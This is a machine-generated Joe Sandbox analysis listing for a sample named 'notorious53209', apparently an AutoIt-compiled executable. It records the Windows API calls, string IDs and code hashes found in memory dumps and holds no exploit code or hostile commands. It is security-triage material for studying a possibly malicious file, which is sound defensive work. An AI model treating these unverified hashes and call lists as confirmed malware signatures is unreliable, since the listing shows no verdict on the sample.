                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 3576275495-1459072770
                                                  • Opcode ID: 454b9a3d37549a9f68f7d77a8a71e01777b73a298989aa6b3094debe45584715
                                                  • Instruction ID: d9ddd519973ca63fa15d142bbea13dca6fa9424bf52af579b8cda6cf0259f6c5
                                                  • Opcode Fuzzy Hash: 454b9a3d37549a9f68f7d77a8a71e01777b73a298989aa6b3094debe45584715
                                                  • Instruction Fuzzy Hash: D9411971604254BEFB20A7698C47EBF77ACFF43710F040069F908E6582EF75DA1196A6
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009040F6
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009041B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: 58db4be52db60ef5d8c38005e92665061ec85d598dad75034580de7fd82ed163
                                                  • Instruction ID: d549074ab95933950d000a9aff0f9a340af5aa2d36d0cb01fe9245d51c6fe7cc
                                                  • Opcode Fuzzy Hash: 58db4be52db60ef5d8c38005e92665061ec85d598dad75034580de7fd82ed163
                                                  • Instruction Fuzzy Hash: 37A18DB12143019FCB14EF28C992A6AB3E5FF84314F144969F9A69B7D2DB34EC05CB42
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 008F5309
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5314
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 008F531F
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 008F532A
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5335
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 008F5340
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 008F534B
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 008F5356
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 008F5361
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 008F536C
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 008F5377
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 008F5382
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 008F538D
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 008F5398
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 008F53A3
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 008F53AE
                                                  • GetCursorInfo.USER32(?), ref: 008F53BE
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 008F53E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                                                  • Instruction ID: 6a7ece479e581dd502185d09175c62c427cc97311b1547367873f51e6ba31595
                                                  • Opcode Fuzzy Hash: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                                                  • Instruction Fuzzy Hash: 97417670E043196ADB109FBA8C49C6EFFF8FF51750B10452FE609E7290DAB855008E65
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DAAA5
                                                  • __swprintf.LIBCMT ref: 008DAB46
                                                  • _wcscmp.LIBCMT ref: 008DAB59
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DABAE
                                                  • _wcscmp.LIBCMT ref: 008DABEA
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 008DAC21
                                                  • GetDlgCtrlID.USER32(?), ref: 008DAC73
                                                  • GetWindowRect.USER32(?,?), ref: 008DACA9
                                                  • GetParent.USER32(?), ref: 008DACC7
                                                  • ScreenToClient.USER32(00000000), ref: 008DACCE
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DAD48
                                                  • _wcscmp.LIBCMT ref: 008DAD5C
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 008DAD82
                                                  • _wcscmp.LIBCMT ref: 008DAD96
                                                    • Part of subcall function 008A386C: _iswctype.LIBCMT ref: 008A3874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 56c6ad26884181dcda251ae0b1063118d7851d3825c99608ff527710c718da37
                                                  • Instruction ID: 9ef6675515b9d8fdc322a155b7a55c0cf451d7ceaf7be71554cb61821c79a467
                                                  • Opcode Fuzzy Hash: 56c6ad26884181dcda251ae0b1063118d7851d3825c99608ff527710c718da37
                                                  • Instruction Fuzzy Hash: C3A1D671204706AFDB18DF24C884FAAB7E9FF04355F20472AF999D2651DB30EA45CB92
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 008DB3DB
                                                  • _wcscmp.LIBCMT ref: 008DB3EC
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DB414
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 008DB431
                                                  • _wcscmp.LIBCMT ref: 008DB44F
                                                  • _wcsstr.LIBCMT ref: 008DB460
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB498
                                                  • _wcscmp.LIBCMT ref: 008DB4A8
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB4CF
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB518
                                                  • _wcscmp.LIBCMT ref: 008DB528
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB550
                                                  • GetWindowRect.USER32(00000004,?), ref: 008DB5B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: da794da71cef8bf1607a550c38522b79a15a5d27b2aa0bddd4a1457ee8a00e16
                                                  • Instruction ID: ee4b2954f48f161b645e2de6d9be8a9b132019ce14e717b729c84051d4e09489
                                                  • Opcode Fuzzy Hash: da794da71cef8bf1607a550c38522b79a15a5d27b2aa0bddd4a1457ee8a00e16
                                                  • Instruction Fuzzy Hash: D181AD71008209DBDB14DF14D885FAA77E8FF54714F08866AFD85CA292DB30DE45CB62
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 9b56e07fab8e711d429f60e62181863e90be01b60b9c6f969f8bf44c87fc24e3
                                                  • Instruction ID: d43fd4d000b27aeea4a115d9477fc9671c0b5b788c795ac01f706672b71fb598
                                                  • Opcode Fuzzy Hash: 9b56e07fab8e711d429f60e62181863e90be01b60b9c6f969f8bf44c87fc24e3
                                                  • Instruction Fuzzy Hash: 7831A236944209E6DB14FA64CD83FEE77B4FF14758F60012AB441F15D5EFA1AE04CA52
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 008DC4D4
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008DC4E6
                                                  • SetWindowTextW.USER32(?,?), ref: 008DC4FD
                                                  • GetDlgItem.USER32(?,000003EA), ref: 008DC512
                                                  • SetWindowTextW.USER32(00000000,?), ref: 008DC518
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC528
                                                  • SetWindowTextW.USER32(00000000,?), ref: 008DC52E
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008DC54F
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008DC569
                                                  • GetWindowRect.USER32(?,?), ref: 008DC572
                                                  • SetWindowTextW.USER32(?,?), ref: 008DC5DD
                                                  • GetDesktopWindow.USER32 ref: 008DC5E3
                                                  • GetWindowRect.USER32(00000000), ref: 008DC5EA
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008DC636
                                                  • GetClientRect.USER32(?,?), ref: 008DC643
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008DC668
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008DC693
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                                                  • Instruction ID: 3e1698d8fcc4a92b46c806ad81f428a6fd88cc09e9944696e903430285d018d5
                                                  • Opcode Fuzzy Hash: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                                                  • Instruction Fuzzy Hash: 20516E7190070AAFDB20DFA8DD85B6EBBF5FF04705F004A29E686E26A0C775E904DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 0090A4C8
                                                  • DestroyWindow.USER32(?), ref: 0090A542
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A5BC
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A5DE
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A5F1
                                                  • DestroyWindow.USER32(00000000), ref: 0090A613
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A64A
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A663
                                                  • GetDesktopWindow.USER32 ref: 0090A67C
                                                  • GetWindowRect.USER32(00000000), ref: 0090A683
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A69B
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A6B3
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                                                  • Instruction ID: fe9d15dacaf969aafb57446fc33cd2e735bbf38ab3660b1a37169c15114ce4de
                                                  • Opcode Fuzzy Hash: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                                                  • Instruction Fuzzy Hash: 6A718671154305AFD720CF28CC49F6A7BFAFB89304F080928F985872A1C772A942DB92
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009046AB
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009046F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: 7645656e9a1e9679da0afa32cf0e558f36c1786532e13fcfa97f64be0e9487a6
                                                  • Instruction ID: 6669cd6ce9d985eb403c2165fa2e883931a9ac38df2b99ed7f50754458a9b1bf
                                                  • Opcode Fuzzy Hash: 7645656e9a1e9679da0afa32cf0e558f36c1786532e13fcfa97f64be0e9487a6
                                                  • Instruction Fuzzy Hash: 78917DB42043019FCB14EF14C891A6AB7E5FF85314F04896DF9969B7A2DB35ED06CB82
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090BB6E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00909431), ref: 0090BBCA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC03
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090BC46
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC7D
                                                  • FreeLibrary.KERNEL32(?), ref: 0090BC89
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090BC99
                                                  • DestroyCursor.USER32(?), ref: 0090BCA8
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BCC5
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BCD1
                                                    • Part of subcall function 008A313D: __wcsicmp_l.LIBCMT ref: 008A31C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 3907162815-1154884017
                                                  • Opcode ID: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                                                  • Instruction ID: 7308d472fe7bce1d653f7ed9369d64b3b5599c53ea9ccdeb1371d8ce4e96ecd8
                                                  • Opcode Fuzzy Hash: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                                                  • Instruction Fuzzy Hash: 8261CD72600229BEEB24DF68CC85FBE77ACFB08710F104619F955D61D1DB74AA90DBA0
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CharLowerBuffW.USER32(?,?), ref: 008EA636
                                                  • GetDriveTypeW.KERNEL32 ref: 008EA683
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA6CB
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA702
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA730
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 9916dfe9c67676ad903076892b0ed19ddc40dc4dcd477cc5d697d4c9c7912cb5
                                                  • Instruction ID: e47aab54268df5824340bd325016f92aea3914a826a74a2f2c52f9e32fca1d56
                                                  • Opcode Fuzzy Hash: 9916dfe9c67676ad903076892b0ed19ddc40dc4dcd477cc5d697d4c9c7912cb5
                                                  • Instruction Fuzzy Hash: 495126751083049FC714EF29C89186AB7F8FF99718F14496CF896972A1DB31EE0ACB52
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA47A
                                                  • __swprintf.LIBCMT ref: 008EA49C
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA4D9
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA4FE
                                                  • _memset.LIBCMT ref: 008EA51D
                                                  • _wcsncpy.LIBCMT ref: 008EA559
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA58E
                                                  • CloseHandle.KERNEL32(00000000), ref: 008EA599
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 008EA5A2
                                                  • CloseHandle.KERNEL32(00000000), ref: 008EA5AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                                                  • Instruction ID: 7f1bc0f69f25eacebe78f334856fa79a90ba89ea6eace7a1b6efba11800aceb9
                                                  • Opcode Fuzzy Hash: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                                                  • Instruction Fuzzy Hash: EC319DB1504249AADB20DFA5DC49FAB77BCFF89B41F1040B6FA08D6160E770A7448B25
                                                  APIs
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                    • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                    • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                    • Part of subcall function 008D874A: RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                    • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                                    • Part of subcall function 008D87E7: RtlAllocateHeap.NTDLL(00000000,?,008D8240), ref: 008D87FA
                                                    • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D8458
